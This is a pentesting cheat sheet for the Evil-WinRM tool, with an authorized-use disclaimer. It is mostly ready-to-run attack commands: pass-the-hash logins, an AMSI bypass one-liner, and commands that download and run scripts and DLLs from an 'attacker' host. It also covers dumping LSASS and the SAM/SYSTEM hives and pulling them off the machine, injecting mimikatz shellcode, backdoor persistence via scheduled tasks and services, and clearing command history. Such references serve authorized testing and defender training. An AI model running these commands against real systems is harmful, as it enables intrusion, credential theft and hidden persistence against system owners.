โ† All cheat sheets

EVILWINRM

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Evil-WinRM is a Windows Remote Management (WinRM) shell for hacking/pentesting.
Provides PowerShell remoting with additional offensive features.

INSTALLATION#

# Ruby gem
gem install evil-winrm

# Or from source
git clone https://github.com/Hackplayers/evil-winrm
cd evil-winrm
bundle install

BASIC CONNECTION#


    

PASSWORD AUTHENTICATION#

evil-winrm -i TARGET -u username -p 'password'
evil-winrm -i 192.168.1.100 -u administrator -p 'P@ssw0rd'
evil-winrm -i TARGET -u domain\\user -p password

HASH AUTHENTICATION (Pass-the-Hash)#

evil-winrm -i TARGET -u username -H NTHASH
evil-winrm -i TARGET -u administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

KERBEROS AUTHENTICATION#

# Export ticket first
export KRB5CCNAME=/path/to/ticket.ccache

# Connect with Kerberos
evil-winrm -i TARGET -r DOMAIN.LOCAL

SSL CONNECTION#

evil-winrm -i TARGET -u user -p pass -S
evil-winrm -i TARGET -u user -p pass -S -c cert.pem -k key.pem

CUSTOM PORT#

evil-winrm -i TARGET -u user -p pass -P 5986

CONNECTION OPTIONS#

-i, --ip IP           Target IP
-u, --user USER       Username
-p, --password PASS   Password
-H, --hash HASH       NTLM hash
-P, --port PORT       WinRM port (default: 5985, SSL: 5986)
-S, --ssl             Enable SSL
-c, --pub-key FILE    Public key for SSL
-k, --priv-key FILE   Private key for SSL
-r, --realm DOMAIN    Kerberos realm
-s, --scripts PATH    PowerShell scripts path
-e, --executables PATH  Executables path

BUILT-IN COMMANDS#


    

FILE OPERATIONS#

upload /local/path /remote/path      # Upload file
upload /tmp/shell.exe C:\Temp\shell.exe
download C:\remote\file /local/path  # Download file
download C:\Windows\System32\config\SAM /tmp/SAM
menu                    # Show menu
help                    # Show help
Bypass-4MSI             # AMSI bypass
Dll-Loader              # Load DLL
Donut-Loader            # Load Donut shellcode
Invoke-Binary           # Run binary in memory

AMSI BYPASS#

# Built-in AMSI bypass
*Evil-WinRM* PS> Bypass-4MSI

# Manual bypass
*Evil-WinRM* PS> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

LOADING SCRIPTS#


    

LOCAL SCRIPTS FOLDER#

# Start with scripts folder
evil-winrm -i TARGET -u user -p pass -s /opt/scripts/

# Load script
*Evil-WinRM* PS> Invoke-Mimikatz.ps1
*Evil-WinRM* PS> Invoke-Mimikatz

# Or directly
*Evil-WinRM* PS> . .\Invoke-Mimikatz.ps1

LOAD FROM URL#

*Evil-WinRM* PS> IEX(New-Object Net.WebClient).DownloadString('http://attacker/script.ps1')

LOADING EXECUTABLES#


    

EXECUTABLES FOLDER#

# Start with executables folder
evil-winrm -i TARGET -u user -p pass -e /opt/exes/

# Run binary in memory
*Evil-WinRM* PS> Invoke-Binary /opt/exes/mimikatz.exe

DLL LOADING#

*Evil-WinRM* PS> Dll-Loader -http http://attacker/payload.dll
*Evil-WinRM* PS> Dll-Loader -smb \\attacker\share\payload.dll
*Evil-WinRM* PS> Dll-Loader -local C:\Temp\payload.dll

DONUT SHELLCODE#

# Convert exe to shellcode with Donut first
donut -f mimikatz.exe -o payload.bin

# Load in Evil-WinRM
*Evil-WinRM* PS> Donut-Loader -process notepad.exe -file payload.bin

COMMON OPERATIONS#


    

ENUMERATION#

*Evil-WinRM* PS> whoami /all
*Evil-WinRM* PS> net users
*Evil-WinRM* PS> net localgroup administrators
*Evil-WinRM* PS> systeminfo
*Evil-WinRM* PS> ipconfig /all
*Evil-WinRM* PS> netstat -ano
*Evil-WinRM* PS> Get-Process
*Evil-WinRM* PS> Get-Service

FILE SYSTEM#

*Evil-WinRM* PS> dir C:\
*Evil-WinRM* PS> Get-ChildItem -Recurse C:\Users
*Evil-WinRM* PS> type C:\file.txt
*Evil-WinRM* PS> Get-Content C:\file.txt

CREDENTIAL HARVESTING#

# LSASS dump
*Evil-WinRM* PS> upload procdump.exe C:\Temp\procdump.exe
*Evil-WinRM* PS> C:\Temp\procdump.exe -accepteula -ma lsass.exe C:\Temp\lsass.dmp
*Evil-WinRM* PS> download C:\Temp\lsass.dmp /tmp/lsass.dmp

# SAM/SYSTEM/SECURITY
*Evil-WinRM* PS> reg save HKLM\SAM C:\Temp\SAM
*Evil-WinRM* PS> reg save HKLM\SYSTEM C:\Temp\SYSTEM
*Evil-WinRM* PS> reg save HKLM\SECURITY C:\Temp\SECURITY
*Evil-WinRM* PS> download C:\Temp\SAM /tmp/SAM
*Evil-WinRM* PS> download C:\Temp\SYSTEM /tmp/SYSTEM

PRIVILEGE ESCALATION#

# Check privileges
*Evil-WinRM* PS> whoami /priv

# Load PowerUp
*Evil-WinRM* PS> . .\PowerUp.ps1
*Evil-WinRM* PS> Invoke-AllChecks

# Load WinPEAS
*Evil-WinRM* PS> upload winPEASx64.exe C:\Temp\winpeas.exe
*Evil-WinRM* PS> C:\Temp\winpeas.exe

PERSISTENCE#

# Scheduled task
*Evil-WinRM* PS> schtasks /create /tn "Backdoor" /tr "C:\Temp\shell.exe" /sc onlogon /ru SYSTEM

# Service
*Evil-WinRM* PS> sc.exe create Backdoor binPath= "C:\Temp\shell.exe" start= auto

LATERAL MOVEMENT#

# Check WinRM on other hosts
*Evil-WinRM* PS> Test-WSMan -ComputerName target2

# Invoke command on remote
*Evil-WinRM* PS> Invoke-Command -ComputerName target2 -ScriptBlock { whoami }

LOGGING AND HISTORY#

# Evil-WinRM saves history to:
# ~/.evil-winrm/history

# View command history
*Evil-WinRM* PS> history

# Clear history
rm ~/.evil-winrm/history

DOCKER USAGE#

# Run via Docker
docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i TARGET -u user -p pass

# With local folders
docker run --rm -ti -v /opt/scripts:/scripts -v /opt/exes:/exes oscarakaelvis/evil-winrm -i TARGET -u user -p pass -s /scripts -e /exes

TROUBLESHOOTING#


    

CONNECTION ISSUES#

# Check if WinRM is enabled
Test-WSMan -ComputerName TARGET

# Check port
nmap -p 5985,5986 TARGET

# Enable WinRM (on target, if you have access)
Enable-PSRemoting -Force
winrm quickconfig

# Allow unencrypted (lab only)
winrm set winrm/config/service '@{AllowUnencrypted="true"}'

# Firewall rules
netsh advfirewall firewall add rule name="WinRM" dir=in localport=5985 protocol=TCP action=allow

KERBEROS ISSUES#

# Ensure /etc/krb5.conf is configured
# Sync time with DC
# Check ticket with klist

TIPS#

# Use tab completion
# Commands are case-insensitive
# Use 'menu' for available functions
# Scripts folder must contain .ps1 files
# Executables folder for Invoke-Binary

QUICK REFERENCE#

evil-winrm -i IP -u user -p pass          # Basic connect
evil-winrm -i IP -u user -H HASH          # Pass-the-Hash
evil-winrm -i IP -u user -p pass -S       # SSL
evil-winrm -i IP -u user -p pass -s /scripts -e /exes  # With tools
upload /local /remote                      # Upload file
download /remote /local                    # Download file
Bypass-4MSI                               # AMSI bypass
Invoke-Binary /path/to/exe                # Run exe in memory
menu                                       # Show commands